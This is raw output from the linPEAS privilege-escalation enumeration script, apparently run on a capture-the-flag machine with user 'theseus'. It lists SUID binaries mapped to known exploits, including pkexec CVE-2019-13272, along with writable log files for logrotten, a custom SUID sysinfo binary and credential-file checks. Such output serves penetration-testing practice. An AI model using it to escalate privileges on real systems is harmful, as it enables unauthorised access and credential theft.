[1;33m[+] [1;32mLooking for Cloud credentials (AWS, Azure, GC)
[0m
[1;33m[+] [1;32mNFS exports?
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
[0m[1;90m/etc/exports Not Found
[0m
[1;33m[+] [1;32mLooking for kerberos conf files and tickets
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt
[0m[1;90mkrb5.conf Not Found
[0m[1;90mtickets kerberos Not Found
[0m[1;90mklist Not Found
[0m
[1;33m[+] [1;32mLooking for Kibana yaml
[0m[1;90mkibana.yml Not Found
[0m
[1;33m[+] [1;32mLooking for Knock configuration
[0m[1;90mKnock.config Not Found
[0m
[1;33m[+] [1;32mLooking for logstash files
[0m[1;90m Not Found
[0m
[1;33m[+] [1;32mLooking for elasticsearch files
[0m[1;90m Not Found
[0m
[1;33m[+] [1;32mLooking for Vault-ssh files
[0m[1;90mvault-ssh-helper.hcl Not Found
[0m
[1;33m[+] [1;32mLooking for AD cached hashes
[0m[1;90mcached hashes Not Found
[0m
[1;33m[+] [1;32mLooking for screen sessions
[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
[0m[1;90mscreen Not Found
[0m
[1;33m[+] [1;32mLooking for tmux sessions
[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
[0m[1;90mtmux Not Found
[0m
[1;33m[+] [1;32mLooking for Couchdb directory
[0m
[1;33m[+] [1;32mLooking for redis.conf
[0m
[1;33m[+] [1;32mLooking for dovecot files
[0m[1;90mdovecot credentials Not Found
[0m
[1;33m[+] [1;32mLooking for mosquitto.conf
[0m
[1;33m[+] [1;32mLooking for neo4j auth file
[0m
[1;33m[+] [1;32mLooking Cloud-Init conf file
[0m
[1;33m[+] [1;32mLooking Erlang cookie file
[0m

[1;34m====================================( [1;32mInteresting Files[1;34m )=====================================
[0m[1;33m[+] [1;32mSUID - Check easy privesc, exploits and write perms
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
[0m/usr/sbin[1;31m/pppd		--->	Apple_Mac_OSX_10.4.8(05-2007)[0m
/usr/bin[1;31m/newgrp		--->	HP-UX_10.20[0m
/usr/bin[1;31m/passwd		--->	Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)[0m
/usr/bin[1;31m/chfn		--->	SuSE_9.3/10[0m
/usr/bin[1;32m/gpasswd[0m
/usr/bin[1;31m/sudo		--->	/sudo$[0m
/usr/bin[1;31m/pkexec		--->	Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)[0m
/usr/bin[1;32m/chsh[0m
/usr/bin[1;32m/traceroute6.iputils[0m
/usr/bin[1;32m/arping[0m
/usr/bin[1;32m/vmware-user-suid-wrapper[0m
/usr/lib/openssh[1;32m/ssh-keysign[0m
/usr/lib/dbus-1.0[1;32m/dbus-daemon-launch-helper[0m
/usr/lib/policykit-1[1;32m/polkit-agent-helper-1[0m
/usr/lib/eject[1;32m/dmcrypt-get-device[0m
/usr/lib/xorg[1;32m/Xorg.wrap[0m
/usr/lib/snapd[1;32m/snap-confine[0m
/snap/core18/1223/bin[1;31m/mount		--->	Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8[0m
/snap/core18/1223/bin[1;32m/ping[0m
/snap/core18/1223/bin[1;32m/su[0m
/snap/core18/1223/bin[1;31m/umount		--->	BSD/Linux(08-1996)[0m
/snap/core18/1223/usr/bin[1;31m/chfn		--->	SuSE_9.3/10[0m
/snap/core18/1223/usr/bin[1;32m/chsh[0m
/snap/core18/1223/usr/bin[1;32m/gpasswd[0m
/snap/core18/1223/usr/bin[1;31m/newgrp		--->	HP-UX_10.20[0m
/snap/core18/1223/usr/bin[1;31m/passwd		--->	Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)[0m
/snap/core18/1223/usr/bin[1;31m/sudo		--->	/sudo$[0m
/snap/core18/1223/usr/lib/dbus-1.0[1;32m/dbus-daemon-launch-helper[0m
/snap/core18/1223/usr/lib/openssh[1;32m/ssh-keysign[0m
/snap/core18/1668/bin[1;31m/mount		--->	Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8[0m
/snap/core18/1668/bin[1;32m/ping[0m
/snap/core18/1668/bin[1;32m/su[0m
/snap/core18/1668/bin[1;31m/umount		--->	BSD/Linux(08-1996)[0m
/snap/core18/1668/usr/bin[1;31m/chfn		--->	SuSE_9.3/10[0m
/snap/core18/1668/usr/bin[1;32m/chsh[0m
/snap/core18/1668/usr/bin[1;32m/gpasswd[0m
/snap/core18/1668/usr/bin[1;31m/newgrp		--->	HP-UX_10.20[0m
/snap/core18/1668/usr/bin[1;31m/passwd		--->	Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)[0m
/snap/core18/1668/usr/bin[1;31m/sudo		--->	/sudo$[0m
/snap/core18/1668/usr/lib/dbus-1.0[1;32m/dbus-daemon-launch-helper[0m
/snap/core18/1668/usr/lib/openssh[1;32m/ssh-keysign[0m
/snap/core/8689/bin[1;31m/mount		--->	Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8[0m
/snap/core/8689/bin[1;32m/ping[0m
/snap/core/8689/bin[1;32m/ping6[0m
/snap/core/8689/bin[1;32m/su[0m
/snap/core/8689/bin[1;31m/umount		--->	BSD/Linux(08-1996)[0m
/snap/core/8689/usr/bin[1;31m/chfn		--->	SuSE_9.3/10[0m
/snap/core/8689/usr/bin[1;32m/chsh[0m
/snap/core/8689/usr/bin[1;32m/gpasswd[0m
/snap/core/8689/usr/bin[1;31m/newgrp		--->	HP-UX_10.20[0m
/snap/core/8689/usr/bin[1;31m/passwd		--->	Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)[0m
/snap/core/8689/usr/bin[1;31m/sudo		--->	/sudo$[0m
/snap/core/8689/usr/lib/dbus-1.0[1;32m/dbus-daemon-launch-helper[0m
/snap/core/8689/usr/lib/openssh[1;32m/ssh-keysign[0m
/snap/core/8689/usr/lib/snapd[1;32m/snap-confine[0m
/snap/core/8689/usr/sbin[1;31m/pppd		--->	Apple_Mac_OSX_10.4.8(05-2007)[0m
/snap/core/7917/bin[1;31m/mount		--->	Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8[0m
/snap/core/7917/bin[1;32m/ping[0m
/snap/core/7917/bin[1;32m/ping6[0m
/snap/core/7917/bin[1;32m/su[0m
/snap/core/7917/bin[1;31m/umount		--->	BSD/Linux(08-1996)[0m
/snap/core/7917/usr/bin[1;31m/chfn		--->	SuSE_9.3/10[0m
/snap/core/7917/usr/bin[1;32m/chsh[0m
/snap/core/7917/usr/bin[1;32m/gpasswd[0m
/snap/core/7917/usr/bin[1;31m/newgrp		--->	HP-UX_10.20[0m
/snap/core/7917/usr/bin[1;31m/passwd		--->	Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)[0m
/snap/core/7917/usr/bin[1;31m/sudo		--->	/sudo$[0m
/snap/core/7917/usr/lib/dbus-1.0[1;32m/dbus-daemon-launch-helper[0m
/snap/core/7917/usr/lib/openssh[1;32m/ssh-keysign[0m
/snap/core/7917/usr/lib/snapd[1;32m/snap-confine[0m
/snap/core/7917/usr/sbin[1;31m/pppd		--->	Apple_Mac_OSX_10.4.8(05-2007)[0m
/bin[1;31m/umount		--->	BSD/Linux(08-1996)[0m
/bin[1;32m/fusermount[0m
/bin/sysinfo
/bin[1;31m/mount		--->	Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8[0m
/bin[1;32m/su[0m
/bin[1;32m/ping[0m

[1;33m[+] [1;32mSGID
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
[0m/usr/bin[1;32m/ssh-agent[0m
/usr/bin[1;32m/mlocate[0m
/usr/bin[1;32m/crontab[0m
/usr/bin[1;32m/bsd-write[0m
/usr/bin[1;32m/expiry[0m
/usr/bin[1;32m/wall[0m
/usr/bin[1;32m/chage[0m
/usr/lib/evolution[1;32m/camel-lock-helper-1.2[0m
/usr/lib/xorg[1;32m/Xorg.wrap[0m
/usr/lib/snapd[1;32m/snap-confine[0m
/sbin[1;32m/pam_extrausers_chkpwd[0m
/sbin[1;32m/unix_chkpwd[0m
/snap/core18/1223/sbin[1;32m/pam_extrausers_chkpwd[0m
/snap/core18/1223/sbin[1;32m/unix_chkpwd[0m
/snap/core18/1223/usr/bin[1;32m/chage[0m
/snap/core18/1223/usr/bin[1;32m/expiry[0m
/snap/core18/1223/usr/bin[1;32m/ssh-agent[0m
/snap/core18/1223/usr/bin[1;32m/wall[0m
/snap/core18/1668/sbin[1;32m/pam_extrausers_chkpwd[0m
/snap/core18/1668/sbin[1;32m/unix_chkpwd[0m
/snap/core18/1668/usr/bin[1;32m/chage[0m
/snap/core18/1668/usr/bin[1;32m/expiry[0m
/snap/core18/1668/usr/bin[1;32m/ssh-agent[0m
/snap/core18/1668/usr/bin[1;32m/wall[0m
/snap/core/8689/sbin[1;32m/pam_extrausers_chkpwd[0m
/snap/core/8689/sbin[1;32m/unix_chkpwd[0m
/snap/core/8689/usr/bin[1;32m/chage[0m
/snap/core/8689/usr/bin[1;32m/crontab[0m
/snap/core/8689/usr/bin[1;32m/dotlockfile[0m
/snap/core/8689/usr/bin[1;32m/expiry[0m
/snap/core/8689/usr/bin[1;32m/mail-lock[0m
/snap/core/8689/usr/bin[1;32m/mail-touchlock[0m
/snap/core/8689/usr/bin[1;32m/mail-unlock[0m
/snap/core/8689/usr/bin[1;32m/ssh-agent[0m
/snap/core/8689/usr/bin[1;32m/wall[0m
/snap/core/8689/usr/lib/snapd[1;32m/snap-confine[0m
/snap/core/7917/sbin[1;32m/pam_extrausers_chkpwd[0m
/snap/core/7917/sbin[1;32m/unix_chkpwd[0m
/snap/core/7917/usr/bin[1;32m/chage[0m
/snap/core/7917/usr/bin[1;32m/crontab[0m
/snap/core/7917/usr/bin[1;32m/dotlockfile[0m
/snap/core/7917/usr/bin[1;32m/expiry[0m
/snap/core/7917/usr/bin[1;32m/mail-lock[0m
/snap/core/7917/usr/bin[1;32m/mail-touchlock[0m
/snap/core/7917/usr/bin[1;32m/mail-unlock[0m
/snap/core/7917/usr/bin[1;32m/ssh-agent[0m
/snap/core/7917/usr/bin[1;32m/wall[0m
/snap/core/7917/usr/lib/snapd[1;32m/snap-confine[0m

[1;33m[+] [1;32mWritable folders configured in /etc/ld.so.conf.d/
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#etc-ld-so-conf-d
[0m[1;32m/usr/lib/x86_64-linux-gnu/libfakeroot[0m
[1;32m/usr/local/lib[0m
[1;32m/usr/local/lib/x86_64-linux-gnu[0m
[1;32m/lib/x86_64-linux-gnu[0m
[1;32m/usr/lib/x86_64-linux-gnu[0m

[1;33m[+] [1;32mCapabilities
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
[0m/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin[1;31m/mtr[0m-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

[1;33m[+] [1;32mUsers with capabilities
[0m
[1;33m[+] [1;32mFiles with ACLs
[0m[1;90mfiles with acls in searched folders Not Found
[0m
[1;33m[+] [1;32m.sh files in path
[0m/usr/bin[1;32m/gettext.sh[0m
/usr/bin/amuFormat.sh

[1;33m[+] [1;32mUnexpected folders in root
[0m[1;31m/cdrom[0m

[1;33m[+] [1;32mFiles (scripts) in /etc/profile.d/
[0mtotal 48
drwxr-xr-x   2 root root  4096 Mar 13 06:08 .
drwxr-xr-x 127 root root 12288 Mar 20 15:27 ..
-rw-r--r--   1 root root    96 Aug 19  2018 [1;32m01-locale-fix.sh[0m
-rw-r--r--   1 root root   825 Jun  4  2019 [1;32mapps-bin-path.sh[0m
-rw-r--r--   1 root root   664 Apr  1  2018 [1;32mbash_completion.sh[0m
-rw-r--r--   1 root root  1003 Dec 29  2015 [1;32mcedilla-portuguese.sh[0m
-rw-r--r--   1 root root    15 Oct 21  2019 disable.history.sh
-rw-r--r--   1 root root   652 Apr  3  2019 input-method-config.sh
-rw-r--r--   1 root root  1941 Jul 16  2018 [1;32mvte-2.91.sh[0m
-rw-r--r--   1 root root   954 May  2  2018 xdg_dirs_desktop_session.sh

[1;33m[+] [1;32mHashes inside passwd file? ........... [0m[1;90mNo
[0m[1;33m[+] [1;32mHashes inside group file? ............ [0m[1;90mNo
[0m[1;33m[+] [1;32mCredentials in fstab/mtab? ........... [0m[1;90mNo
[0m[1;33m[+] [1;32mCan I read shadow files? ............. [0m[1;90mNo
[0m[1;33m[+] [1;32mCan I read root folder? .............. [0m[1;90mNo
[0m
[1;33m[+] [1;32mLooking for root files in home dirs (limit 20)
[0m/home

[1;33m[+] [1;32mLooking for others files in folders owned by me
[0m
[1;33m[+] [1;32mReadable files belonging to root and readable by me but not world readable
[0m[1;31m-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo[0m

[1;33m[+] [1;32mModified interesting files in the last 5mins (limit 100)
[0m[1;31m/home/theseus/Documents[0m/scan.txt
/var/www/Magic/images/uploads/middle.jpg
/var/log/auth.log
/var/log/vmware-vmsvc-root.log
/var/log/syslog
/var/log/journal/1456d592d9a64495ba5b92bdbdb0cc08/user-1000.journal
/var/log/journal/1456d592d9a64495ba5b92bdbdb0cc08/system.journal

[1;33m[+] [1;32mWritable log files (logrotten) (limit 100)
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation
[0mWritable:[1;31m /home/theseus/.local/share/gvfs-metadata/root-6ae7366b.log
[0mWritable:[1;31m /home/theseus/.local/share/gvfs-metadata/home-a416e256.log
[0mWritable:[1;31m /home/theseus/.local/share/xorg/Xorg.0.log.old
[0mWritable:[1;31m /home/theseus/.local/share/xorg/Xorg.0.log
[0m[3m#)You_can_write_more_log_files_inside_last_directory
[0m[3m#)You_can_write_more_log_files_inside_last_directory
[0m[3m#)You_can_write_more_log_files_inside_last_directory
[0m[3m#)You_can_write_more_log_files_inside_last_directory
[0m
[1;33m[+] [1;32mFiles inside /home/theseus (limit 20)
[0mtotal 84
drwxr-xr-x 15 theseus theseus 4096 Apr 16 02:58 .
drwxr-xr-x  3 root    root    4096 Oct 15  2019 ..
lrwxrwxrwx  1 theseus theseus    9 Oct 21  2019 .bash_history -> /dev/null
-rw-r--r--  1 theseus theseus  220 Oct 15  2019 .bash_logout
-rw-r--r--  1 theseus theseus   15 Oct 21  2019 .bash_profile
-rw-r--r--  1 theseus theseus 3771 Oct 15  2019 .bashrc
drwxrwxr-x 13 theseus theseus 4096 Mar 13 05:57 .cache
drwx------ 13 theseus theseus 4096 Oct 22  2019 .config
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Desktop
drwxr-xr-x  3 theseus theseus 4096 Jun  1 18:05 Documents
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Downloads
drwx------  3 theseus theseus 4096 Jun  1 02:15 .gnupg
-rw-------  1 theseus theseus 7334 Apr 15 23:50 .ICEauthority
drwx------  3 theseus theseus 4096 Oct 21  2019 .local
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Music
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Pictures
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Public
drwx------  2 theseus theseus 4096 Jun  1 10:20 .ssh
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Templates
-r--------  1 theseus theseus   33 May 31 20:51 user.txt
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Videos

[1;33m[+] [1;32mFiles inside others home (limit 20)
[0m
[1;33m[+] [1;32mLooking for installed mail applications
[0m
[1;33m[+] [1;32mMails (limit 50)
[0m
[1;33m[+] [1;32mBackup files?
[0m-rwxr-xr-x 1 root root 6785 Apr 24  2018 /var/lib/app-info/icons/ubuntu-bionic-universe/64x64/lucky[1;31mbackup[0m_lucky[1;31mbackup[0m.png
-rwxr-xr-x 1 root root 2168 Apr 24  2018 /var/lib/app-info/icons/ubuntu-bionic-universe/64x64/kup-[1;31mbackup[0m_kup.png
-rwxr-xr-x 1 root root 1665 Apr 24  2018 /var/lib/app-info/icons/ubuntu-bionic-universe/48x48/kup-[1;31mbackup[0m_kup.png
-rw-r--r-- 1 root root 2904 Oct 15  2019 /etc/apt/sources[1;31m.bak[0m
-rw-r--r-- 1 theseus theseus 23645 Apr 15 04:33 /home/theseus/.local/share/xorg/Xorg.0.log[1;31m.old[0m

[1;33m[+] [1;32mLooking for tables inside readable .db/.sqlite files (limit 100)
[0m[1;32m -> Extracting tables from[0m /var/lib/colord/mapping.db [1;90m(limit 20)
[0m
[1;32m -> Extracting tables from[0m /var/lib/colord/storage.db [1;90m(limit 20)
[0m
[1;32m -> Extracting tables from[0m /var/lib/fwupd/pending.db [1;90m(limit 20)
[0m
[1;32m -> Extracting tables from[0m /var/lib/PackageKit/transactions.db [1;90m(limit 20)
[0m
[1;32m -> Extracting tables from[0m /home/theseus/.local/share/evolution/addressbook/system/contacts.db [1;90m(limit 20)
[0m[1;34m  --> Found interesting column names in[0m folder_id_email_list [1;90m(output limit 10)
[0mCREATE TABLE '[1;31mfolder_id_email_list[0m' (uid TEXT NOT NULL REFERENCES 'folder_id' (uid), value TEXT)

[1;32m -> Extracting tables from[0m /home/theseus/.local/share/zeitgeist/activity.sqlite [1;90m(limit 20)
[0m

[1;33m[+] [1;32mWeb files?(output limit)
[0m/var/www/:
total 16K
drwxr-xr-x  4 root     root     4.0K Mar 13 06:07 .
drwxr-xr-x 15 root     root     4.0K Oct 15  2019 ..
drwxr-xr-x  2 root     root     4.0K Dec  3 07:55 html
drwxr-xr-x  4 www-data www-data 4.0K Mar 17 09:10 Magic

/var/www/html:
total 8.0K
drwxr-xr-x 2 root root 4.0K Dec  3 07:55 .

[1;33m[+] [1;32mReadable *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .gitconfig, .git-credentials, .git, .svn, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data
[0m-rw-r--r-- 1 [1;31mroot[0m [1;31mroot[0m 2319 Apr  4  2018 /etc/bash.[1;31mbashrc[0m
-rw-r--r-- 1 [1;31mroot[0m [1;31mroot[0m 3771 Apr  4  2018 /etc/skel/.[1;31mbashrc[0m
-rw-r--r-- 1 [1;31mroot[0m [1;31mroot[0m 807 Apr  4  2018 /etc/skel/[1;31m.profile[0m
lrwxrwxrwx 1 [1;31mroot[0m [1;31mroot[0m 43 Oct 15  2019 /etc/systemd/system/timers.target.wants/snapd.snap-repair.timer -> /lib/systemd/system/snapd.snap-repair.timer
lrwxrwxrwx 1 [1;96m[1;95mtheseus[0m[0m [1;96m[1;95mtheseus[0m[0m 9 Oct 21  2019 /home/[1;96m[1;95mtheseus[0m[0m/.bash[1;31m_history[0m -> /dev/null
[1;32mLooking for possible passwords inside /home/theseus/.bash_history (limit 100)
[0m
-rw-r--r-- 1 [1;96m[1;95mtheseus[0m[0m [1;96m[1;95mtheseus[0m[0m 3771 Oct 15  2019 /home/[1;96m[1;95mtheseus[0m[0m/.[1;31mbashrc[0m
-rw-r--r-- 1 [1;31mroot[0m [1;31mroot[0m 3106 Sep 27  2019 /usr/share/base-files/dot.[1;31mbashrc[0m
-rw-r--r-- 1 [1;31mroot[0m [1;31mroot[0m 2778 Aug 13  2017 /usr/share/doc/adduser/examples/adduser.local.conf.examples/bash.[1;31mbashrc[0m
-rw-r--r-- 1 [1;31mroot[0m [1;31mroot[0m 802 Aug 13  2017 /usr/share/doc/adduser/examples/adduser.local.conf.examples/skel/dot.[1;31mbashrc[0m

[1;33m[+] [1;32mAll hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
[0m-rw-r--r-- 1 root root 235821 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/.config.old
-rw-r--r-- 1 root root 235662 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/.config
-rw-r--r-- 1 root root 1125 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/.missing-syscalls.d
-rw-r--r-- 1 root root 8714 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.elf.o.cmd
-rw-r--r-- 1 root root 5039 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.fixdep.o.cmd
-rw-r--r-- 1 root root 5803 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.sigchain.o.cmd
-rw-r--r-- 1 root root 7866 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.run-command.o.cmd
-rw-r--r-- 1 root root 7734 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.builtin-orc.o.cmd
-rw-r--r-- 1 root root 6706 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.pager.o.cmd
-rw-r--r-- 1 root root 6383 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.exec-cmd.o.cmd
-rw-r--r-- 1 root root 6444 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.objtool.o.cmd
-rw-r--r-- 1 root root 444 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.fixdep-in.o.cmd
-rw-r--r-- 1 root root 8290 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.orc_gen.o.cmd
-rw-r--r-- 1 root root 8373 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.check.o.cmd
-rw-r--r-- 1 root root 5986 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.libstring.o.cmd
-rw-r--r-- 1 root root 3778 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.libctype.o.cmd
-rw-r--r-- 1 root root 4488 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.str_error_r.o.cmd
-rw-r--r-- 1 root root 7472 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.builtin-check.o.cmd
-rw-r--r-- 1 root root 4133 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.fixdep.o.d
-rw-r--r-- 1 root root 8261 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.special.o.cmd
-rw-r--r-- 1 root root 2014 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.subcmd-config.o.cmd
-rw-r--r-- 1 root root 8604 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.orc_dump.o.cmd
-rw-r--r-- 1 root root 1310 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.libsubcmd-in.o.cmd
-rw-r--r-- 1 root root 8970 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/arch/x86/.decode.o.cmd
-rw-r--r-- 1 root root 473 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/arch/x86/.objtool-in.o.cmd
-rw-r--r-- 1 root root 6180 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.parse-options.o.cmd
-rw-r--r-- 1 root root 2022 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.objtool-in.o.cmd
-rw-r--r-- 1 root root 6859 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/tools/objtool/.help.o.cmd
-rw-r--r-- 1 root root 314 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/arch/x86/include/generated/uapi/asm/.unistd_x32.h.cmd
-rw-r--r-- 1 root root 294 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd
-rw-r--r-- 1 root root 289 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd
-rw-r--r-- 1 root root 266 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd
-rw-r--r-- 1 root root 266 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd
-rw-r--r-- 1 root root 294 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/arch/x86/include/generated/asm/.unistd_32_ia32.h.cmd
-rw-r--r-- 1 root root 392 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd
-rw-r--r-- 1 root root 290 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/arch/x86/include/generated/asm/.unistd_64_x32.h.cmd
-rw-r--r-- 1 root root 4629 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/arch/x86/tools/.relocs_common.o.cmd
-rw-r--r-- 1 root root 4657 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/arch/x86/tools/.relocs_32.o.cmd
-rw-r--r-- 1 root root 4657 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/arch/x86/tools/.relocs_64.o.cmd
-rw-r--r-- 1 root root 148 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/arch/x86/tools/.relocs.cmd
-rw-r--r-- 1 root root 68118 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/arch/x86/kernel/.asm-offsets.s.cmd
-rw-r--r-- 1 root root 4193 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/basic/.fixdep.cmd
-rw-r--r-- 1 root root 3530 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/.conmakehash.cmd
-rw-r--r-- 1 root root 4548 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/.asn1_compiler.cmd
-rw-r--r-- 1 root root 5848 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/selinux/genheaders/.genheaders.cmd
-rw-r--r-- 1 root root 6664 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/selinux/mdp/.mdp.cmd
-rw-r--r-- 1 root root 1506 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/.bin2c.cmd
-rw-r--r-- 1 root root 6415 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/.extract-cert.cmd
-rw-r--r-- 1 root root 5813 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/mod/.sumversion.o.cmd
-rw-r--r-- 1 root root 104 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/mod/.elfconfig.h.cmd
-rw-r--r-- 1 root root 6859 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/mod/.devicetable-offsets.s.cmd
-rw-r--r-- 1 root root 131 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/mod/.modpost.cmd
-rw-r--r-- 1 root root 3158 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/mod/.empty.o.cmd
-rw-r--r-- 1 root root 5805 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/mod/.modpost.o.cmd
-rw-r--r-- 1 root root 3725 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/mod/.mk_elfconfig.cmd
-rw-r--r-- 1 root root 4820 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/mod/.file2alias.o.cmd
-rw-r--r-- 1 root root 4800 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/.recordmcount.cmd
-rw-r--r-- 1 root root 5395 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/.insert-sys-cert.cmd
-rw-r--r-- 1 root root 164 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/kconfig/.parser.tab.h.cmd
-rw-r--r-- 1 root root 4015 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/kconfig/.symbol.o.cmd
-rw-r--r-- 1 root root 137 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/kconfig/.lexer.lex.c.cmd
-rw-r--r-- 1 root root 4111 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/kconfig/.parser.tab.o.cmd
-rw-r--r-- 1 root root 245 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/kconfig/.conf.cmd
-rw-r--r-- 1 root root 3933 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/kconfig/.preprocess.o.cmd
